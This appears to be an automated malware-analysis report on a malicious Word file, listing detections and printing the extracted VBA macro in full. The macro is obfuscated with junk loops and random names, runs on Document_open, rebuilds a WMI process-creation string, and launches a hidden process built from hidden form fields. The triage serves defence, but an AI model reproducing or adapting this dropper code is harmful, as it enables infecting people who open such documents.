MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Malware.Chartres-7540846-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chartres-7540846-0
-
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGERRaw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Kfjlhmfubtbvi = GetObject(Shodtafokxon) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10988 bytes |
SHA-256: 5c25959b38cab32ecf4cb36bf088a8cc5fafd65893f3fd86ea4e5d35830fa2e6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
201 of 316 identifiers look randomly generated (e.g. 'Gcmdhheenkjmh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Baziplbvb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Uabyesfstbget
End Sub
Attribute VB_Name = "Wqeqntqamvo"
Attribute VB_Base = "0{34E70FD0-AB09-43FF-994B-8DC63C6F8929}{39145296-D93B-4C7A-A758-CB516D06D15B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fionwdvo"
Function Yrqkwwvxufplb()
Do While Szuwafpocp = 24
Loop
Do While Dqzoewxzdo = 2
Agaighqeehlst = Sgn(3)
Licxwhvlfbs = CByte(Hkiecxwteh + Zxfveguihlqb)
Loop
Do While Peuvgoze = 63
Ygqwzuhbtcwk = Cos(234 + CStr(324))
Loop
Do While Avxyevthnbh = 5555
Jauuvalxyqxjm = Hoefoeulqaz
Rtophvyb = 234
Loop
Do While Bjetcezps = 2
Zyxbcuood = CDbl(4)
Zkgebicqfmigc = Int(1)
Loop
Do While Lrgrlhjvru = 1
Ebjnvofktny = CInt(Mbmsqsufsjx)
Loop
Irprekqr = ChrW(wdKeyP)
Do While Jxaamlgia = 24
Loop
Do While Jaqkgijcpiyyq = 2
Omzwiyopd = Sgn(3)
Laaqbuimw = CByte(Oyauhewlyjjix + Dnzvlmuyw)
Loop
Do While Yheqduor = 63
Wnqjtssy = Cos(234 + CStr(324))
Loop
Do While Dwsqunbejuad = 5555
Gphhgotfv = Ajlrubauq
Onvqtjhe = 234
Loop
Do While Blcdlksnyxal = 2
Dpnpszivgdat = CDbl(4)
Vkyrgpyyini = Int(1)
Loop
Do While Hsbbdebmd = 1
Lajgfzdszcro = CInt(Etwfgzhcrb)
Loop
Ipowwpdxslz = Irprekqr + Wqeqntqamvo.Jczsdgzvfgdm + Wqeqntqamvo.Cwliurncvgba
Do While Wataityx = 24
Loop
Do While Xogajcfjv = 2
Qqtkjdif = Sgn(3)
Stxgfcuicxzc = CByte(Yymtejuoizgjz + Qqsxleujudzkb)
Loop
Do While Bojylkqpao = 63
Lxavdeim = Cos(234 + CStr(324))
Loop
Do While Fvrepspez = 5555
Yyrzbeozbrjla = Uhwgtgctjn
Vyzwohhnz = 234
Loop
Do While Baumgqwjqvdyh = 2
Zpweimuwsbbv = CDbl(4)
Svllmufy = Int(1)
Loop
Do While Dndqlrasnvisr = 1
Jhdblfvb = CInt(Asmvnnavabvid)
Loop
Jdtmcecbfwb = Split(Ipowwpdxslz + LTrim(LTrim(Wqeqntqamvo.Mlxmdusjyclvm. _
Tag)), ",,,,sdf7&&jsad,,,")
Do While Uotryxjh = 24
Loop
Do While Uievqpzgnpzcz = 2
Ebigqhqhwl = Sgn(3)
Sybkmsnbftq = CByte(Yyxrarpfft + Axqdbhjd)
Loop
Do While Imenklmgk = 63
Vrjtpwtxlmef = Cos(234 + CStr(324))
Loop
Do While Uwxemgjlrq = 5555
Nhdszjjhfgh = Lqfotdgvbp
Byekjzticjl = 234
Loop
Do While Nvwbgopnsbqd = 2
Mdrlsodxkewvg = CDbl(4)
Jbemvghk = Int(1)
Loop
Do While Azbjxoglcgek = 1
Eopkrfkibliz = CInt(Brftyprpconq)
Loop
Yrqkwwvxufplb = Guserfnvhbdr + Join(Jdtmcecbfwb, "") + Guserfnvhbdr
Do While Dcyaohnq = 24
Loop
Do While Odvzqryjhh = 2
Lmkunkujhlzn = Sgn(3)
Tvcsegjcq = CByte(Dlorcldmjqmpt + Wqdcdihj)
Loop
Do While Hpchjjvm = 63
Ygsfzvairg = Cos(234 + CStr(324))
Loop
Do While Ybktzntnv = 5555
Nvwbeahqcvk = Yxchhzrrxyr
Qkiskowpekduw = 234
Loop
Do While Qcmnyuubkm = 2
Kzpwfahjwikkv = CDbl(4)
Tnznlrib = Int(1)
Loop
Do While Dccviygfrl = 1
Oxuoymhsbsq = CInt(Okyufcyu)
Loop
End Function
Function Uabyesfstbget()
a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,m,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,gm,,,,sdf7&&jsad,,,t,,,,sdf7&&jsad,,," + ChrW(wdKeyS) + ",,,,sdf7&&jsad,,,:w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,i,,,,sdf7&&jsad,,,n3,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,2_" + Wqeqntqamvo.Xcnrzapjuiqim + "r,,,,sdf7&&jsad,,,oces,,,,sdf7&&jsad,,,s"
Do While Delmrfct = 24
Loop
Do While Gtmtcllelkdmu = 2
Vnqthrmehrbja = Sgn(3)
Rtlzmdkmcqb = CByte(Cyrksmvrmzt + Pfcabkouskau)
Loop
Do While Kbndfwxbizrqn = 63
Ftstsofjborgv = Cos(234 + CStr(324))
Loop
Do While Rplqkpywojv = 5555
Cjlxuunqiaogf = Ooqcrtibew
Gxdkxbjhsd = 234
Loop
Do While Awyjpxkfyn = 2
Ttwcuhgaklgse = CDbl(4)
Fwktluecuvy = Int(1)
Loop
Do While Meltpeqdf = 1
Kwsapqfeyg = CInt(Nuweprbhvv)
Loop
q = ",,,,sdf7&&jsad,,,"
Do While Aimlxpig = 24
Loop
Do While Hwxhontezth = 2
Tqebhvfmst = Sgn(3)
Sbydjrqhqk = CByte(Cioskpnw + Tvsnblcdpduwv)
Loop
Do While Bqbrwsivdzzh = 63
Cfgotick = Cos(234 + CStr(324))
Loop
Do While Ffnvrfgmcxj = 5555
Faglzpocdp = Xohcdsrvklq
Extneosdtbo = 234
Loop
Do While Dugobpmhtryky = 2
Ebtjbyurvpyb = CDbl(4)
Dmtogpwowk = Int(1)
Loop
Do While Flfudgjazsie = 1
Idlzcodxpfevr = CInt(Pejijsjlalsr)
Loop
Dbctmjfhcy = Split(",,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,," + a, q)
Do While Fkcxhxyitlh = 24
Loop
Do While Fzqmhuvsfb = 2
Wegyqvkkozmb = Sgn(3)
Ivrjvttbrpe = CByte(Fexzjadlts + Pxotgnpj)
Loop
Do While Aawfhaumqu = 63
Egrzcazepc = Cos(234 + CStr(324))
Loop
Do While Fwehkcpyt = 5555
Wcdsdqgb = Esicgkojmxxt
Lvmbofkrlcvxz = 234
Loop
Do While Nibrmbdvferao = 2
Gcmdhheenkjmh = CDbl(4)
Jlhoyowbd = Int(1)
Loop
Do While Ahxwevlpw = 1
Vaojdohdow = CInt(Ugtahhjajfzhw)
Loop
Shodtafokxon = Join(Dbctmjfhcy, "")
Do While Llsulkxuwi = 24
Loop
Do While Ugqxsghqiqo = 2
Iptucvxmxmkee = Sgn(3)
Etojmglzfk = CByte(Nuduwuvduezt + Cwtgsnmylocel)
Loop
Do While Qokxdksusnkjq = 63
Uuxmdpgy = Cos(234 + CStr(324))
Loop
Do While Fojpsrjcheqo = 5555
Pkcbsievjk = Hyohjpsex
Ezvbgjkkfy = 234
Loop
Do While Tmefjnkfyvljk = 2
Uawrltbx = CDbl(4)
Hxmyanjuavuej = Int(1)
Loop
Do While Npkjomqtiqjj = 1
Esocjbpx = CInt(Hbpjsfprnaydq)
Loop
Set Kfjlhmfubtbvi = GetObject(Shodtafokxon)
Do While Xifynatlenb = 24
Loop
Do While Veznokzis = 2
Vchqosapji = Sgn(3)
Xonnrqwtwqo = CByte(Btyrwhepwcks + Lmmhzkqbyawis)
Loop
Do While Nfonynzcxmbgy = 63
Cvptkhkjoj = Cos(234 + CStr(324))
Loop
Do While Uxuopiqiwweej = 5555
Ouydsalybs = Scvaexneed
Yhspgqlkyw = 234
Loop
Do While Pfizjzsvqwy = 2
Wahvhgkw = CDbl(4)
Khvrlhonv = Int(1)
Loop
Do While Kzoovekcv = 1
Mojqdoqqks = CInt(Xrnhgnci)
Loop
Wdyoaxnvx = Shodtafokxon + ChrW(wdKeyS) + Wqeqntqamvo.Iblaypsyp.ControlTipText$ + Wqeqntqamvo.Nnkgiuoz.ControlTipText
Do While Bwsfphkk = 24
Loop
Do While Mjyyipsnndot = 2
Qlsfrnjah = Sgn(3)
Idzjcjwx = CByte(Jtuiwyiormih + Doetbjmbquz)
Loop
Do While Dltrvykhsywv = 63
Lqvvbolg = Cos(234 + CStr(324))
Loop
Do While Dwhhhdaj = 5555
Edxumidgk = Xlhaluyyx
Xpozqdapxnljw = 234
Loop
Do While Ajslfvxwfkag = 2
Blmyifhgns = CDbl(4)
Vsulcksst = Int(1)
Loop
Do While Lbaatioqx = 1
Wcylodmtv = CInt(Yaebtipndp)
Loop
Lkjqsexwqz = Wdyoaxnvx + Wqeqntqamvo.Xcnrzapjuiqim
Do While Oikdcrvvv = 24
Loop
Do While Dkdyqwnvnqp = 2
Qkuwlnswl = Sgn(3)
Sixvvaugq = CByte(Uugzibqvq + Bmsxzjhgs)
Loop
Do While Yfhzsanwi = 63
Lpzplfrfp = Cos(234 + CStr(324))
Loop
Do While Ngkdxakzj = 5555
Nwbsjjqiuq = Bcxkxbpmbuts
Ocmlicwycdo = 234
Loop
Do While Hphspvljazqny = 2
Lsdiruunvjhpy = CDbl(4)
Uvdfiwuc = Int(1)
Loop
Do While Pfocvxkjznjzf = 1
Ncljhgmh = CInt(Ujslarpzm)
Loop
Set Uabyesfstbget = GetObject(Lkjqsexwqz)
Do While Dgsnxwwyx = 24
Loop
Do While Lbhrmzmpg = 2
Cdlasgljnycpa = Sgn(3)
Fzxaesaylu = CByte(Cgrzqdfeobwdq + Agjlgodtnrf)
Loop
Do While Cfagphicw = 63
Muxuecukrf = Cos(234 + CStr(324))
Loop
Do While Cjwjzmdikeac = 5555
Qojekegw = Rjpkxvhzcn
Sxjpsrcitvkdm = 234
Loop
Do While Muulfjks = 2
Skpwazwctwmvu = CDbl(4)
Ursvzmyruvf = Int(1)
Loop
Do While Snietszg = 1
Tvnasjoqzi = CInt(Srxqlutuav)
Loop
Uabyesfstbget. _
showwindow = False
Do While Hxiwirce = 24
Loop
Do While Ldlbxeocnt = 2
Rcnctxnfgpyc = Sgn(3)
Sdmqsjer = CByte(Lspvcgpykof + Gxerjdvfix)
Loop
Do While Kqxahozsaq = 63
Rdzaasoum = Cos(234 + CStr(324))
Loop
Do While Sosvooidv = 5555
Rqrydagnip = Zgdvfpiczpkel
Ldrnfpimjico = 234
Loop
Do While Ympwstpktcn = 2
Jbfmmohujqc = CDbl(4)
Quumdauob = Int(1)
Loop
Do While Isvdakoatyyk = 1
Pahtovnflcvqg = CInt(Sbixjdutdu)
Loop
Do While Kfjlhmfubtbvi.Create(n & Yrqkwwvxufplb, Qwxgfjsix, Uabyesfstbget, Hdolqqhqrp)
Loop
Do While Rifipuhxlsio = 24
Loop
Do While Trukyageksxa = 2
Lavgadgkob = Sgn(3)
Hykkziew = CByte(Bfvvmmxmko + Llxcobkjctdwt)
Loop
Do While Ztpwkzbyqler = 63
Cqsojmznxu = Cos(234 + CStr(324))
Loop
Do While Ahhbycesys = 5555
Dzkmhqjkqwad = Kuulwutzyt
Mcmbnjuzlkc = 234
Loop
Do While Gkrudhepq = 2
Xmwazdarvs = CDbl(4)
Ypirimxzs = Int(1)
Loop
Do While Qkcfulmzw = 1
Danuahjl = CInt(Bctevqvdssq)
Loop
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.